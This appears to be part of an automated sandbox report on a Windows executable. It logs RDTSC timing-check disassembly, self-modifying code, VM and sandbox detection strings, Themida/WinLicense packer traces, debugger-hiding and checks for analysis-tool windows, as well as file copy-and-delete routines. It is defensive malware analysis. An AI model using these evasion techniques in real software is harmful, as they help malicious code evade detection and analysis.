                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685696 second address: 6856AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007FC070C1F30Ch 0x0000000e jc 00007FC070C1F306h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6856AE second address: 6856B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 685962 second address: 685999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F30Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jno 00007FC070C1F30Ch 0x00000010 pushad 0x00000011 jmp 00007FC070C1F315h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D3D4 second address: 68D3ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E45h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D3ED second address: 68D402 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F311h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D402 second address: 68D416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC070F37E3Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D416 second address: 68D41C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D41C second address: 68D42D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070F37E3Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D701 second address: 68D705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 68D705 second address: 68D70B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694A72 second address: 694A7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop esi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694BEC second address: 694BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694D27 second address: 694D2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694D2C second address: 694D4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070F37E43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FC070F37E36h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694D4D second address: 694D79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070C1F317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC070C1F311h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 694D79 second address: 694D83 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC070F37E3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1D02 second address: 6A1D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C1F30Bh 0x00000009 pop edi 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1D12 second address: 6A1D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1D18 second address: 6A1D1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1D1C second address: 6A1D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070F37E45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FC070F37E36h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1D41 second address: 6A1D4D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 js 00007FC070C1F306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1D4D second address: 6A1D53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1D53 second address: 6A1D5D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC070C1F306h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A1D5D second address: 6A1D66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A37FC second address: 6A3801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A3801 second address: 6A382C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC070F37E47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jmp 00007FC070F37E3Bh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6BD2 second address: 6A6BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6BD6 second address: 6A6C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FC070F37E4Ah 0x0000000c jc 00007FC070F37E36h 0x00000012 jmp 00007FC070F37E3Eh 0x00000017 jmp 00007FC070F37E44h 0x0000001c jmp 00007FC070F37E41h 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6C21 second address: 6A6C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6A6C28 second address: 6A6C2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFA29 second address: 6AFA2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFA2D second address: 6AFA31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFA31 second address: 6AFA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFA37 second address: 6AFA3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6AFA3D second address: 6AFA55 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FC070C1F313h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7218 second address: 6B721D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B721D second address: 6B7223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B7223 second address: 6B722D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC070F37E36h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B881B second address: 6B885F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC070C1F30Bh 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007FC070C1F314h 0x00000015 je 00007FC070C1F306h 0x0000001b pop edi 0x0000001c push edx 0x0000001d jmp 00007FC070C1F311h 0x00000022 pop edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B885F second address: 6B8865 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B8865 second address: 6B886B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C26D4 second address: 6C26E1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C26E1 second address: 6C26E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C26E7 second address: 6C26EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0E75 second address: 6C0E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C0FDE second address: 6C1015 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC070F37E45h 0x00000008 jbe 00007FC070F37E36h 0x0000000e jns 00007FC070F37E36h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e pushad 0x0000001f jne 00007FC070F37E36h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C11B5 second address: 6C11BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C18F3 second address: 6C1902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FC070F37E3Eh 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C242C second address: 6C2443 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC070C1F306h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ecx 0x0000000d js 00007FC070C1F328h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C2443 second address: 6C245B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E44h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4C2A second address: 6D4C30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4C30 second address: 6D4C3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FC070F37E36h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4C3E second address: 6D4C44 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4C44 second address: 6D4C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007FC070F37E46h 0x0000000f jmp 00007FC070F37E3Eh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4C71 second address: 6D4C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D4C77 second address: 6D4C7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D7639 second address: 5D765D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070C1F318h 0x00000009 jnp 00007FC070C1F30Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E83F6 second address: 6E840C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC070F37E41h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F75E4 second address: 6F75F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jng 00007FC070C1F306h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F75F3 second address: 6F75F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F75F7 second address: 6F75FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F75FF second address: 6F7606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F9980 second address: 6F9984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDBFD second address: 6FDC2A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC070F37E38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007FC070F37E5Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC070F37E48h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDC2A second address: 6FDC2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FDE4F second address: 6FDE9A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b call 00007FC070F37E49h 0x00000010 movsx edx, bx 0x00000013 pop edx 0x00000014 push 00000004h 0x00000016 mov edx, 431DCEE1h 0x0000001b push 730D5D21h 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FC070F37E44h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE111 second address: 6FE139 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC070C1F30Ch 0x00000008 jo 00007FC070C1F306h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push dword ptr [ebp+122D23B2h] 0x00000019 sub edx, dword ptr [ebp+122D3342h] 0x0000001f push F7CD2BB2h 0x00000024 push edi 0x00000025 push ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FFB59 second address: 6FFB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FC070F37E3Fh 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF6B7 second address: 6FF6BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701737 second address: 701740 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B056E second address: 50B05D4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC070C1F30Bh 0x00000008 or ch, FFFFFFDEh 0x0000000b jmp 00007FC070C1F319h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 movzx ecx, di 0x00000019 mov edi, 733197ECh 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007FC070C1F312h 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FC070C1F317h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B05D4 second address: 50B05DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B05DA second address: 50B05DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B05DE second address: 50B05F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC070F37E3Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B05F4 second address: 50B0606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC070C1F30Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50B0606 second address: 50B060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 46DC0E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 60AB63 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 46B376 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 699E27 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-37721
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_001940F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0018E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00181710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00181710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_001947C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00193B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00193B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00194B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00194B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0018DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0018EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0018BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0018DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0018DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00181160 GetSystemInfo,ExitProcess,0_2_00181160
                Source: file.exe, file.exe, 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1727662731.0000000001223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                Source: file.exe, 00000000.00000002.1727662731.00000000011AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1727662731.0000000001223000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1727662731.00000000011F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36533
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36536
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36588
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36548
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36556
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-36422
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
